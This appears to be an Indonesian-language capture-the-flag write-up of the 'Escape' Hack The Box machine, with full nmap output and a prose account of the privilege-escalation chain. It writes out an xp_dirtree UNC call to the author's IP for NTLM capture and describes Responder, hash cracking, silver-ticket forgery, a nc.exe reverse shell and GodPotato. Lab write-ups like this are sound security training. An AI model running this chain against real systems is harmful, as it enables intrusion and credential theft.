Escape

Information Gathering

Port and Service

# nmap -p- -sVC --min-rate 1000 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.35s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-22 16:06:55Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-04-22T16:08:29+00:00; +8h00m00s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.202:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-22T16:03:42
|_Not valid after:  2055-04-22T16:03:42
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:08:29+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
49723/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-22T16:07:49
|_  start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s

Initial Access - PublicUser

SMB Anonymous access

Disini saya mencoba melakukan SMB Anonymous access dan menemukan terdapat folder yang menarik yaitu folder "Public"

disini saya langsung connect ke SMB untuk melihat isi dari folder public tersebut

didalam folder tersebut terdapat file "SQL Server Procedures.pdf", selanjutnya saya transfer file tersebut ke lokal dan disini saya mendapatkan credential

Credential in SQL Server Procedures.pdf

sesuai dengan informasi pada pdf tersebut credential tersebut digunakan untuk SQL Server, disini saya akan mengaksesnya menggunakan impacket-mssqlclient

disini saya berhasil masuk.

Sql_svc Via NTLM Poisoning

disini user tersebut memiliki akses terbatas, akan tetapi dapat menjalankan xp_dirtree. disini saya akan melakukan NTLM Poisoning dengan Responder

Capturing sql_svc NTLMv2

pertama saya menjalankan listener responder di terminal

selanjutnya saya menjalankan xp_dirtree \\10.10.14.5\s (IP address saya)

pada responder, disini terdapat sebuah event yang masuk, ini adalah NTLM dari sql_svc

selanjutnya saya akan crack NTLMv2 tersebut dengan menggunakan hashcat

disini saya berhasil cracking hash tersebut

disini saya mencoba untuk terkoneksi menggunakn impacket-mssqlclient

sayangnya disini saya tidak dapat melakukan command execution, selanjutnya saya mencoba memeriksa apakah user tersebut bisa untuk winrm atau tidak

user tersebut dapat digunakan untuk winrm

Administrator Via Silver Ticket and Godpotato

Disini saya memeriksa Privilege Information current user (sql_svc)

tidak ada yang menarik. disini saya akan mencoba silver ticket untuk menaikan hak aksesnya, saya melakukan silver ticket karena saya pikir user ini memiliki spn dan berjalan pada mssql. sebetulnya ini menjadi salah satu hal yang menarik, dikutip dari 0xdf writeup bahwa sql_svc dapat digunakan untuk silver ticket untuk alasan yang tidak disengaja

Escape "Unintended"

disini saya juga sudah memastikan user spn yang terdapat pada mesin tersebut dan hasilnya saya tidak menemukan spn sql_svc

lanjut, disini saya membuat TGS ticket dengan menggunakan impacket-ticketer. sebelum menggunakan impacket-ticketer saya membutuhkan beberapa informasi seperti

  • User NTLM

  • Domain SID

  • spn (optional)

User NTLM

Domain SID

Create Ticket

bisa juga menggunakan

kemudian sinkronasi timedatenya untuk kerberos

selanjutnya connect ke mssql dengan impacket-mssqlclient dan argument -k untuk menggunakan kerberos authentication

berhasil terkoneksi ke mssql sebagai Administrator, selanjutnya saya melakukan verifikasi privilegenya

dapat dilihat pada output tersebut disini user tersebut telah memiliki SeImpersonatePrivilege yang memungkinkan saya melakukan abuse terhadap privilege tersebut dengan Godpotato.

sebelumnya untuk kemudahan menjalankan perintah saya melakukan reverse shell dengan memunggah nc.exe kemudian saya juga memunggah godpotato.exe.

part terakhir, disini saya akan menjalankan godpotato.exe

disini saya telah berhasil mendapatkan nt authority\system

Last updated